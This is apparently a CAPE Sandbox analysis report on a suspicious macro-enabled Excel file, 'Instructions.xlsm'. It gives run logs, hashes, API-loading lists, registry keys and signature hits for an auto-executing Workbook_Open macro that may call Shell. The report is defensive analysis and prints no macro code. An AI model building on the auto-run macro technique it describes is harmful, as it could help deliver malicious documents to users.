CAPE Sandbox

Analysis

Category	Package	Started	Completed	Duration	Options	Log
FILE	xls	2019-02-11 19:46:59	2019-02-11 19:50:42	223 seconds	Show Options	Show Log

route = internet
procdump = 1

2019-02-11 19:47:00,015 [root] INFO: Date set to: 02-11-19, time set to: 19:47:00, timeout set to: 200
2019-02-11 19:47:00,046 [root] DEBUG: Starting analyzer from: C:\xqsoqngca
2019-02-11 19:47:00,046 [root] DEBUG: Storing results at: C:\tnauzXIj
2019-02-11 19:47:00,046 [root] DEBUG: Pipe server name: \\.\PIPE\WVUhadKI
2019-02-11 19:47:00,046 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-02-11 19:47:00,046 [root] INFO: Automatically selected analysis package "xls"
2019-02-11 19:47:00,920 [root] DEBUG: Started auxiliary module Browser
2019-02-11 19:47:00,920 [root] DEBUG: Started auxiliary module Curtain
2019-02-11 19:47:00,920 [modules.auxiliary.digisig] INFO: Skipping authenticode validation, signtool.exe was not found in bin/
2019-02-11 19:47:00,920 [root] DEBUG: Started auxiliary module DigiSig
2019-02-11 19:47:00,936 [root] DEBUG: Started auxiliary module Disguise
2019-02-11 19:47:00,936 [root] DEBUG: Started auxiliary module Human
2019-02-11 19:47:00,936 [root] DEBUG: Started auxiliary module Screenshots
2019-02-11 19:47:00,936 [root] DEBUG: Started auxiliary module Sysmon
2019-02-11 19:47:00,936 [root] DEBUG: Started auxiliary module Usage
2019-02-11 19:47:00,936 [root] INFO: Analyzer: Package modules.packages.xls does not specify a DLL option
2019-02-11 19:47:00,936 [root] INFO: Analyzer: Package modules.packages.xls does not specify a DLL_64 option
2019-02-11 19:47:01,092 [lib.api.process] INFO: Successfully executed process from path "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" with arguments ""C:\Users\user\AppData\Local\Temp\Instructions.xlsm" /e" with pid 560
2019-02-11 19:47:01,092 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-02-11 19:47:01,092 [lib.api.process] INFO: 32-bit DLL to inject is C:\xqsoqngca\dll\ACOMWQj.dll, loader C:\xqsoqngca\bin\BYMKpsr.exe
2019-02-11 19:47:01,107 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 560
2019-02-11 19:47:03,119 [lib.api.process] INFO: Successfully resumed process with pid 560
2019-02-11 19:47:03,119 [root] INFO: Added new process to list with pid: 560
2019-02-11 19:47:03,213 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-02-11 19:47:03,213 [root] DEBUG: Process dumps enabled.
2019-02-11 19:47:03,259 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 560 at 0x74980000, image base 0x2f9a0000, stack from 0x2a6000-0x2b0000
2019-02-11 19:47:03,259 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\Instructions.xlsm" \e.
2019-02-11 19:47:03,259 [root] INFO: Monitor successfully loaded in process with pid 560.
2019-02-11 19:47:03,306 [root] DEBUG: DLL loaded at 0x719D0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\mso (0x11e4000 bytes).
2019-02-11 19:47:03,354 [root] DEBUG: DLL loaded at 0x74740000: C:\Windows\system32\msi (0x240000 bytes).
2019-02-11 19:47:03,384 [root] DEBUG: DLL loaded at 0x74DC0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-02-11 19:47:30,966 [root] DEBUG: DLL loaded at 0x745A0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\Comctl32 (0x19e000 bytes).
2019-02-11 19:47:30,980 [root] INFO: Disabling sleep skipping.
2019-02-11 19:47:31,043 [root] DEBUG: DLL loaded at 0x74190000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf (0x40f000 bytes).
2019-02-11 19:47:31,698 [root] DEBUG: DLL loaded at 0x75B30000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-02-11 19:47:31,713 [root] DEBUG: DLL loaded at 0x74180000: C:\Windows\system32\msimtf (0xb000 bytes).
2019-02-11 19:47:31,713 [root] DEBUG: DLL loaded at 0x74170000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-02-11 19:47:31,792 [root] DEBUG: DLL loaded at 0x71880000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\riched20 (0x14f000 bytes).
2019-02-11 19:47:31,838 [root] DEBUG: DLL loaded at 0x6D350000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\MSORES (0x452a000 bytes).
2019-02-11 19:47:31,855 [root] DEBUG: DLL loaded at 0x6D0E0000: C:\Program Files (x86)\Common Files\Microsoft Shared\office14\1033\MSOINTL (0x262000 bytes).
2019-02-11 19:47:31,901 [root] DEBUG: DLL loaded at 0x6CF50000: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus (0x190000 bytes).
2019-02-11 19:47:31,933 [root] DEBUG: DLL unloaded from 0x77230000.
2019-02-11 19:47:31,980 [root] INFO: Announced 32-bit process name:  pid: 36702776
2019-02-11 19:47:31,980 [root] INFO: Added new process to list with pid: 36702776
2019-02-11 19:47:31,980 [lib.api.process] WARNING: The process with pid 36702776 is not alive, injection aborted
2019-02-11 19:47:31,980 [root] DEBUG: DLL loaded at 0x74120000: C:\Windows\system32\mscoree (0x4a000 bytes).
2019-02-11 19:47:31,980 [root] DEBUG: set_caller_info: Adding region at 0x001B0000 to caller regions list (advapi32::RegQueryInfoKeyW).
2019-02-11 19:47:31,980 [root] DEBUG: set_caller_info: Adding region at 0x004C0000 to caller regions list (kernel32::FindFirstFileExW).
2019-02-11 19:47:31,980 [root] DEBUG: DLL loaded at 0x740A0000: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei (0x7b000 bytes).
2019-02-11 19:47:32,104 [root] DEBUG: DLL loaded at 0x74080000: C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPC (0x20000 bytes).
2019-02-11 19:47:32,244 [root] DEBUG: DLL loaded at 0x6CED0000: C:\Windows\system32\UxTheme (0x80000 bytes).
2019-02-11 19:47:32,401 [root] DEBUG: DLL loaded at 0x74060000: C:\Windows\system32\DwmApi (0x13000 bytes).
2019-02-11 19:47:32,431 [root] DEBUG: DLL unloaded from 0x75D20000.
2019-02-11 19:47:32,431 [root] DEBUG: DLL loaded at 0x74030000: C:\Windows\system32\POWRPROF (0x25000 bytes).
2019-02-11 19:47:32,463 [root] DEBUG: DLL loaded at 0x75420000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-02-11 19:47:32,463 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-02-11 19:47:32,463 [root] DEBUG: DLL loaded at 0x756A0000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-02-11 19:47:32,463 [root] DEBUG: DLL unloaded from 0x74030000.
2019-02-11 19:47:32,572 [root] INFO: Process with pid 36702776 has terminated
2019-02-11 19:47:32,947 [root] DEBUG: DLL loaded at 0x751D0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-02-11 19:47:32,947 [root] DEBUG: DLL loaded at 0x75190000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-02-11 19:47:32,961 [root] DEBUG: DLL loaded at 0x74050000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-02-11 19:47:33,273 [root] DEBUG: DLL loaded at 0x76430000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-02-11 19:47:33,305 [root] DEBUG: DLL unloaded from 0x2F9A0000.
2019-02-11 19:47:33,336 [root] DEBUG: DLL loaded at 0x75420000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2019-02-11 19:47:33,336 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2019-02-11 19:47:33,336 [root] DEBUG: DLL loaded at 0x756A0000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2019-02-11 19:47:33,336 [root] DEBUG: DLL loaded at 0x6CDD0000: C:\Windows\system32\propsys (0xf5000 bytes).
2019-02-11 19:47:33,336 [root] DEBUG: DLL unloaded from 0x76430000.
2019-02-11 19:47:33,351 [root] DEBUG: DLL loaded at 0x74C10000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-02-11 19:47:33,351 [root] DEBUG: DLL loaded at 0x76240000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-02-11 19:47:33,446 [root] DEBUG: DLL loaded at 0x74040000: C:\Windows\system32\profapi (0xb000 bytes).
2019-02-11 19:47:33,461 [root] DEBUG: DLL loaded at 0x760D0000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2019-02-11 19:47:33,476 [root] DEBUG: DLL loaded at 0x77130000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-02-11 19:47:33,493 [root] DEBUG: DLL loaded at 0x756C0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-02-11 19:47:33,507 [root] DEBUG: DLL loaded at 0x75D80000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-02-11 19:47:33,507 [root] DEBUG: DLL loaded at 0x758C0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-02-11 19:47:33,664 [root] DEBUG: DLL loaded at 0x6CDB0000: C:\Windows\system32\MPR (0x12000 bytes).
2019-02-11 19:47:33,742 [root] WARNING: Unable to access file at path "C:\Users\user\AppData\Local\Temp\~$Instructions.xlsm": [Errno 13] Permission denied: u'C:\\Users\\user\\AppData\\Local\\Temp\\~$Instructions.xlsm'
2019-02-11 19:47:33,835 [root] DEBUG: DLL loaded at 0x6CC50000: C:\Windows\System32\msxml6 (0x158000 bytes).
2019-02-11 19:47:34,428 [root] DEBUG: DLL unloaded from 0x77230000.
2019-02-11 19:47:34,585 [root] DEBUG: DLL loaded at 0x6CBF0000: C:\Windows\system32\SXS (0x5f000 bytes).
2019-02-11 19:47:34,615 [root] DEBUG: DLL loaded at 0x6C960000: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\VBE7 (0x28d000 bytes).
2019-02-11 19:47:34,694 [root] DEBUG: DLL loaded at 0x65300000: C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA7\1033\VBE7INTL (0x26000 bytes).
2019-02-11 19:47:34,694 [root] DEBUG: set_caller_info: Adding region at 0x06710000 to caller regions list (ntdll::memcpy).
2019-02-11 19:47:34,740 [root] DEBUG: set_caller_info: Adding region at 0x008E0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2019-02-11 19:47:34,740 [root] DEBUG: set_caller_info: Adding region at 0x00650000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-02-11 19:47:34,740 [root] DEBUG: set_caller_info: Adding region at 0x00440000 to caller regions list (advapi32::RegCloseKey).
2019-02-11 19:47:34,772 [root] DEBUG: set_caller_info: Adding region at 0x04F70000 to caller regions list (ntdll::memcpy).
2019-02-11 19:47:34,772 [root] DEBUG: set_caller_info: Adding region at 0x00020000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-02-11 19:47:34,849 [root] DEBUG: set_caller_info: Adding region at 0x00430000 to caller regions list (msvcrt::memcpy).
2019-02-11 19:47:34,865 [root] DEBUG: set_caller_info: Adding region at 0x06550000 to caller regions list (ntdll::memcpy).
2019-02-11 19:47:34,881 [root] DEBUG: set_caller_info: Adding region at 0x01F60000 to caller regions list (ntdll::memcpy).
2019-02-11 19:50:24,967 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-02-11 19:50:24,967 [root] INFO: Created shutdown mutex.
2019-02-11 19:50:25,982 [root] INFO: Setting terminate event for process 560.
2019-02-11 19:50:26,496 [root] INFO: Shutting down package.
2019-02-11 19:50:26,496 [root] INFO: Stopping auxiliary modules.
2019-02-11 19:50:26,496 [root] INFO: Finishing auxiliary modules.
2019-02-11 19:50:26,496 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-02-11 19:50:26,496 [root] INFO: Analysis completed.

MalScore

5.0

Suspicious

Machine

Name	Label	Manager	Started On	Shutdown On
target-03	target-03	ESX	2019-02-11 19:46:59	2019-02-11 19:50:41

File Details

File Name	Instructions.xlsm
File Size	37429 bytes
File Type	Microsoft Excel 2007+
MD5	a498ba99ea588b7bdd15d0e67eb2abbe
SHA1	7243454847fa71a7ca839af3b1e0009bc1c93d92
SHA256	d8261ce7b29193b64efec094dffdcc51774cd1473e679ca407b4e37af9e7ee4c
SHA512	15b76ba955a1dc137796792bbccb49eba5f338fc89518faa3ccca5dbd23d9f8e67d23e493bf337cb6579ad850dfb4ed1bc53f8232732e5630977a449fbfdba75
CRC32	0097C113
Ssdeep	768:nrXl/xFilEq/EQvuWcZg7cToDGhBeGhMEV+4+4eMYgjNESlMp:nZrilvdOo4oDGP5e8+rRMYqNESlo
TrID	42.2% (.XLAM) Excel Macro-enabled Open XML add-in (83500/1/13) 29.1% (.XLSM) Excel Microsoft Office Open XML Format document (with Macro) (57500/1/12) 17.2% (.XLSX) Excel Microsoft Office Open XML Format document (34000/1/7) 8.8% (.ZIP) Open Packaging Conventions container (17500/1/4) 2.0% (.ZIP) ZIP compressed archive (4000/1)
ClamAV	None matched
Yara	None matched
CAPE Yara	None matched
	Download Download ZIP Resubmit sample

Signatures

Dynamic (imported) function loading detected

DynamicLoader: OLEAUT32.dll/

DynamicLoader: mso.dll/

DynamicLoader: OLEAUT32.dll/

DynamicLoader: kernel32.dll/NlsGetCacheUpdateCount

DynamicLoader: OLEAUT32.dll/

DynamicLoader: mso.dll/

DynamicLoader: OLEAUT32.dll/

DynamicLoader: mso.dll/

DynamicLoader: SHELL32.DLL/SHIsFileAvailableOffline

DynamicLoader: mso.dll/

DynamicLoader: Comctl32.dll/RegisterClassNameW

DynamicLoader: mso.dll/

DynamicLoader: kernel32.dll/GetNativeSystemInfo

DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW

DynamicLoader: ADVAPI32.dll/CheckTokenMembership

DynamicLoader: kernel32.dll/GetSystemWow64DirectoryW

DynamicLoader: kernel32.dll/GetFileAttributesExW

DynamicLoader: VERSION.dll/GetFileVersionInfoA

DynamicLoader: VERSION.dll/GetFileVersionInfoSizeA

DynamicLoader: VERSION.dll/VerQueryValueA

DynamicLoader: VERSION.dll/GetFileVersionInfoW

DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW

DynamicLoader: VERSION.dll/VerQueryValueW

DynamicLoader: mso.dll/

DynamicLoader: SXS.DLL/SxsOleAut32MapReferenceClsidToConfiguredClsid

DynamicLoader: mso.dll/

DynamicLoader: kernel32.dll/FlsAlloc

DynamicLoader: kernel32.dll/FlsGetValue

DynamicLoader: kernel32.dll/FlsSetValue

DynamicLoader: kernel32.dll/FlsFree

DynamicLoader: kernel32.dll/IsProcessorFeaturePresent

DynamicLoader: VBE7.DLL/DllVbeInit

DynamicLoader: mso.dll/_MsoInitGimme@12

DynamicLoader: mso.dll/_MsoFGimmeFeatureEx@8

DynamicLoader: mso.dll/_MsoFGimmeComponentEx@24

DynamicLoader: mso.dll/_MsoFGimmeComponentEx@20

DynamicLoader: mso.dll/_MsoFGimmeFileEx@24

DynamicLoader: mso.dll/_MsoFGimmeFileEx@20

DynamicLoader: mso.dll/_MsoSetLVProperty@8

DynamicLoader: mso.dll/_MsoVBADigSigCallDlg@20

DynamicLoader: mso.dll/_MsoVbaInitSecurity@4

DynamicLoader: mso.dll/_MsoFIEPolicyAndVersion@8

DynamicLoader: mso.dll/_MsoFUseIEFeature@8

DynamicLoader: mso.dll/_MsoFAnsiCodePageSupportsLCID@8

DynamicLoader: mso.dll/_MsoFInitOffice@20

DynamicLoader: mso.dll/_MsoUninitOffice@4

DynamicLoader: mso.dll/_MsoFGetFontSettings@20

DynamicLoader: mso.dll/_MsoRgchToRgwch@16

DynamicLoader: mso.dll/_MsoHrSimpleQueryInterface@16

DynamicLoader: mso.dll/_MsoHrSimpleQueryInterface2@20

DynamicLoader: mso.dll/_MsoFCreateControl@36

DynamicLoader: mso.dll/_MsoFLongLoad@8

DynamicLoader: mso.dll/_MsoFLongSave@8

DynamicLoader: mso.dll/_MsoFGetTooltips@0

DynamicLoader: mso.dll/_MsoFSetTooltips@4

DynamicLoader: mso.dll/_MsoFLoadToolbarSet@24

DynamicLoader: mso.dll/_MsoFCreateToolbarSet@28

DynamicLoader: mso.dll/_MsoInitShrGlobal@4

DynamicLoader: mso.dll/_MsoHpalOffice@0

DynamicLoader: mso.dll/_MsoFWndProcNeeded@4

DynamicLoader: mso.dll/_MsoFWndProc@24

DynamicLoader: mso.dll/_MsoFCreateITFCHwnd@20

DynamicLoader: mso.dll/_MsoDestroyITFC@4

DynamicLoader: mso.dll/_MsoFPitbsFromHwndAndMsg@12

DynamicLoader: mso.dll/_MsoFGetComponentManager@4

DynamicLoader: mso.dll/_MsoMultiByteToWideChar@24

DynamicLoader: mso.dll/_MsoWideCharToMultiByte@32

DynamicLoader: mso.dll/_MsoHrRegisterAll@0

DynamicLoader: mso.dll/_MsoFSetComponentManager@4

DynamicLoader: mso.dll/_MsoFCreateStdComponentManager@20

DynamicLoader: mso.dll/_MsoFHandledMessageNeeded@4

DynamicLoader: mso.dll/_MsoPeekMessage@8

DynamicLoader: mso.dll/_MsoGetWWWCmdInfo@20

DynamicLoader: mso.dll/_MsoFExecWWWHelp@8

DynamicLoader: mso.dll/_MsoFCreateIPref@28

DynamicLoader: mso.dll/_MsoDestroyIPref@4

DynamicLoader: mso.dll/_MsoChsFromLid@4

DynamicLoader: mso.dll/_MsoCpgFromChs@4

DynamicLoader: mso.dll/_MsoSetLocale@4

DynamicLoader: mso.dll/_MsoFSetHMsoinstOfSdm@4

DynamicLoader: mso.dll/_MsoVBADigSig2CallDlgEx@28

DynamicLoader: mso.dll/_MsoVbaInitSecurityEx@4

DynamicLoader: OLEAUT32.dll/SysFreeString

DynamicLoader: OLEAUT32.dll/LoadTypeLib

DynamicLoader: OLEAUT32.dll/RegisterTypeLib

DynamicLoader: OLEAUT32.dll/QueryPathOfRegTypeLib

DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib

DynamicLoader: OLEAUT32.dll/OleTranslateColor

DynamicLoader: OLEAUT32.dll/OleCreateFontIndirect

DynamicLoader: OLEAUT32.dll/OleCreatePictureIndirect

DynamicLoader: OLEAUT32.dll/OleLoadPicture

DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrameIndirect

DynamicLoader: OLEAUT32.dll/OleCreatePropertyFrame

DynamicLoader: OLEAUT32.dll/OleIconToCursor

DynamicLoader: OLEAUT32.dll/LoadTypeLibEx

DynamicLoader: OLEAUT32.dll/OleLoadPictureEx

DynamicLoader: USER32.dll/GetSystemMetrics

DynamicLoader: USER32.dll/MonitorFromWindow

DynamicLoader: USER32.dll/MonitorFromRect

DynamicLoader: USER32.dll/MonitorFromPoint

DynamicLoader: USER32.dll/EnumDisplayMonitors

DynamicLoader: USER32.dll/GetMonitorInfoA

DynamicLoader: USER32.dll/EnumDisplayDevicesA

DynamicLoader: OLEAUT32.dll/DispCallFunc

DynamicLoader: OLEAUT32.dll/LoadTypeLibEx

DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib

DynamicLoader: OLEAUT32.dll/CreateTypeLib2

DynamicLoader: OLEAUT32.dll/VarDateFromUdate

DynamicLoader: OLEAUT32.dll/VarUdateFromDate

DynamicLoader: OLEAUT32.dll/GetAltMonthNames

DynamicLoader: OLEAUT32.dll/VarNumFromParseNum

DynamicLoader: OLEAUT32.dll/VarParseNumFromStr

DynamicLoader: OLEAUT32.dll/VarDecFromR4

DynamicLoader: OLEAUT32.dll/VarDecFromR8

DynamicLoader: OLEAUT32.dll/VarDecFromDate

DynamicLoader: OLEAUT32.dll/VarDecFromI4

DynamicLoader: OLEAUT32.dll/VarDecFromCy

DynamicLoader: OLEAUT32.dll/VarR4FromDec

DynamicLoader: OLEAUT32.dll/GetRecordInfoFromTypeInfo

DynamicLoader: OLEAUT32.dll/GetRecordInfoFromGuids

DynamicLoader: OLEAUT32.dll/SafeArrayGetRecordInfo

DynamicLoader: OLEAUT32.dll/SafeArraySetRecordInfo

DynamicLoader: OLEAUT32.dll/SafeArrayGetIID

DynamicLoader: OLEAUT32.dll/SafeArraySetIID

DynamicLoader: OLEAUT32.dll/SafeArrayCopyData

DynamicLoader: OLEAUT32.dll/SafeArrayAllocDescriptorEx

DynamicLoader: OLEAUT32.dll/SafeArrayCreateEx

DynamicLoader: OLEAUT32.dll/VarFormat

DynamicLoader: OLEAUT32.dll/VarFormatDateTime

DynamicLoader: OLEAUT32.dll/VarFormatNumber

DynamicLoader: OLEAUT32.dll/VarFormatPercent

DynamicLoader: OLEAUT32.dll/VarFormatCurrency

DynamicLoader: OLEAUT32.dll/VarWeekdayName

DynamicLoader: OLEAUT32.dll/VarMonthName

DynamicLoader: OLEAUT32.dll/VarAdd

DynamicLoader: OLEAUT32.dll/VarAnd

DynamicLoader: OLEAUT32.dll/VarCat

DynamicLoader: OLEAUT32.dll/VarDiv

DynamicLoader: OLEAUT32.dll/VarEqv

DynamicLoader: OLEAUT32.dll/VarIdiv

DynamicLoader: OLEAUT32.dll/VarImp

DynamicLoader: OLEAUT32.dll/VarMod

DynamicLoader: OLEAUT32.dll/VarMul

DynamicLoader: OLEAUT32.dll/VarOr

DynamicLoader: OLEAUT32.dll/VarPow

DynamicLoader: OLEAUT32.dll/VarSub

DynamicLoader: OLEAUT32.dll/VarXor

DynamicLoader: OLEAUT32.dll/VarAbs

DynamicLoader: OLEAUT32.dll/VarFix

DynamicLoader: OLEAUT32.dll/VarInt

DynamicLoader: OLEAUT32.dll/VarNeg

DynamicLoader: OLEAUT32.dll/VarNot

DynamicLoader: OLEAUT32.dll/VarRound

DynamicLoader: OLEAUT32.dll/VarCmp

DynamicLoader: OLEAUT32.dll/VarDecAdd

DynamicLoader: OLEAUT32.dll/VarDecCmp

DynamicLoader: OLEAUT32.dll/VarBstrCat

DynamicLoader: OLEAUT32.dll/VarCyMulI4

DynamicLoader: OLEAUT32.dll/VarBstrCmp

DynamicLoader: ole32.dll/CoCreateInstanceEx

DynamicLoader: ole32.dll/CLSIDFromProgIDEx

DynamicLoader: mso.dll/

DynamicLoader: mso.dll/_MsoMultiByteToWideChar@24

DynamicLoader: SXS.DLL/SxsOleAut32RedirectTypeLibrary

DynamicLoader: ADVAPI32.dll/RegOpenKeyW

DynamicLoader: ADVAPI32.dll/RegEnumKeyW

DynamicLoader: ADVAPI32.dll/RegQueryValueW

DynamicLoader: SXS.DLL/SxsOleAut32MapConfiguredClsidToReferenceClsid

DynamicLoader: mso.dll/_MsoFTranslateCp@16

DynamicLoader: mso.dll/

The office file contains 3 macros

The office file contains a macro with auto execution

Workbook_Open: Runs when the Excel Workbook is opened

The office file contains a macro with suspicious strings

Shell: May run an executable file or a system command

Screenshots

Hosts

No hosts contacted.

DNS

No domains contacted.

Summary

C:\Users\user\AppData\Local\Temp\Instructions.xlsm
C:\Users\user\AppData\Local\Temp\~$Instructions.xlsm
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSO.DLL
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\VBE7.DLL
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\VBE7INTL.DLL
C:\Windows\sysnative\C_932.NLS
C:\Windows\sysnative\C_949.NLS
C:\Windows\sysnative\C_950.NLS
C:\Windows\sysnative\C_936.NLS
C:\Users\user\AppData\Local\Temp\~DF49239E0E82F9713F.TMP
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
C:\Windows\SysWOW64\stdole2.tlb
C:\Windows\SysWOW64\FM20.DLL
C:\Users\user\AppData\Local\Temp\~DF30BDA18782E58210.TMP

C:\Users\user\AppData\Local\Temp\Instructions.xlsm
C:\Users\user\AppData\Local\Temp\~$Instructions.xlsm
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\VBE7.DLL
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\VBE7INTL.DLL
C:\Users\user\AppData\Local\Temp\~DF49239E0E82F9713F.TMP
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
C:\Windows\SysWOW64\stdole2.tlb
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSO.DLL
C:\Windows\SysWOW64\FM20.DLL
C:\Users\user\AppData\Local\Temp\~DF30BDA18782E58210.TMP

C:\Users\user\AppData\Local\Temp\~$Instructions.xlsm
C:\Users\user\AppData\Local\Temp\Instructions.xlsm
C:\Users\user\AppData\Local\Temp\~DF49239E0E82F9713F.TMP
C:\Users\user\AppData\Local\Temp\~DF30BDA18782E58210.TMP

HKEY_CURRENT_USER\Software\Microsoft\Office\Common
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\AssertTimerVerboseLog
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\AssertTimer
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\LBBreakpoint
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\QFE_17407
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\14.0\Common\Security
HKEY_CLASSES_ROOT\CLSID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{88d96a0c-f192-11d4-a65f-0040963251e5}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{88D96A0C-F192-11D4-A65F-0040963251E5}\InsecureQI
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Security\NoOleLoadFromStreamChecks
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office\14.0\Common\OpenXMLFormat
HKEY_LOCAL_MACHINE\Software\Microsoft\Msxml60
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\14.0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MsoHeapInit
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\DefaultSheetR2L
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\A4Letter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\CursorVisual
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\ControlCharacters
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\DefaultFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\AutomaticPictureCompressionDefault
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\DiscardImageEdits
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\DefaultImageDPI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\FallbackToStream
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Options\QFE_Saskatchewan
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\ExtensionHardening
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\FileBlock\XlsmAndXltmFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\11A2F13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\11A2F13\11A2F13
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Publisher\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\PowerPoint\Internet
HKEY_LOCAL_MACHINE\Software\Netscape\Netscape Navigator
HKEY_LOCAL_MACHINE\Software\Netscape\Netscape Navigator Gold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\AllowPNG
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\RelyOnVML
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\DownloadComponents
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\DoNotUseLongFileNames
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\DoNotOrganizeInFolder
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Internet
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\DoNotRelyOnCSS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\ScreenSize
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\PixelsPerInch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\14.0\Common\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\14.0\Common\Internet\LocationOfComponents
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Encoding
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Locations\AllLocationsDisabled
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\14.0\Common\Security\Trusted Locations
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Locations\BlockFQDNFileProtocol
